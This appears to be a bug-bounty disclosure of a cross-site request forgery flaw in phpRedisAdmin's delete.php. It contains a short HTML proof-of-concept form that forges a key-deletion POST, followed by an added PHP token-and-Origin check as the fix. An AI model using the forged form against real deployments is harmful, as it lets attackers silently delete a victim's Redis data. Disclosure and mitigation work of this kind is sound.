Cross-Site Request Forgery (CSRF) in erikdubbelboer/phpredisadmin


Reported on

Aug 23rd 2021

✍️ Description

The key-deletion functionality of the application (delete.php) is vulnerable to a CSRF attack.

🕵️‍♂️ Proof of Concept

  <!-- Attacker-hosted page: the victim's browser attaches its phpRedisAdmin session cookie to this cross-site POST -->
  <script>history.pushState('', '', '/')</script>
    <form action="https://domain.tld/phpRedisAdmin/delete.php?s=1&d=0&batch_del=1" method="POST">
      <input type="hidden" name="post" value="1" />
      <input type="hidden" name="selected&#95;keys" value="123&#44;" />
      <input type="submit" value="Submit request" />
    </form>

💥 Impact

This vulnerability can let an attacker delete keys from the Redis database without the knowledge or interaction of the logged-in user.
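For the maintainer's side, an added example (not phpRedisAdmin's own code) of the synchronizer-token check that delete.php could run before honouring selected_keys; it assumes PHP sessions are enabled, that the same application renders the delete form, and uses a hypothetical field name csrf_token.

```php
<?php
// Added example, not phpRedisAdmin's code: reject the cross-site POST shown in
// the PoC by requiring a per-session token (hypothetical field name csrf_token).
// Assumes PHP sessions are enabled and the same app renders the delete form.
session_start();

// One random token per session, embedded in every state-changing form.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Constant-time comparison; a forged form cannot know the session's token.
function csrf_valid(array $post, array $session): bool
{
    $expected = $session['csrf_token'] ?? '';
    $given = $post['csrf_token'] ?? '';
    return $expected !== '' && is_string($given) && hash_equals($expected, $given);
}

// Defence in depth: if the browser sent an Origin header, it must be our host.
function origin_ok(array $server): bool
{
    if (!isset($server['HTTP_ORIGIN'])) {
        return true; // no header: fall through to the token check only
    }
    $origin = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
    $self = explode(':', $server['HTTP_HOST'] ?? '')[0];
    return is_string($origin) && $self !== '' && strcasecmp($origin, $self) === 0;
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['post'])) {
    if (!origin_ok($_SERVER) || !csrf_valid($_POST, $_SESSION)) {
        http_response_code(403);
        exit('Rejected: cross-site request or invalid CSRF token');
    }
    // Only now parse selected_keys (e.g. "123,") and delete them from Redis.
    $keys = array_filter(explode(',', (string) ($_POST['selected_keys'] ?? '')));
    // ... existing delete logic for $keys goes here ...
}
?>
<!-- The legitimate form carries the token; the PoC page above cannot. -->
<form action="delete.php?s=1&d=0&batch_del=1" method="POST">
  <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
  <input type="hidden" name="post" value="1">
  <input type="hidden" name="selected_keys" value="123,">
  <input type="submit" value="Delete selected keys">
</form>
```

With the token required, the PoC form's POST fails the hash_equals check and returns 403 before any key is touched.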


We have contacted a member of the erikdubbelboer/phpredisadmin team and are waiting to hear back 2 years ago
Erik Dubbelboer marked this as fixed with commit b57e3b 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE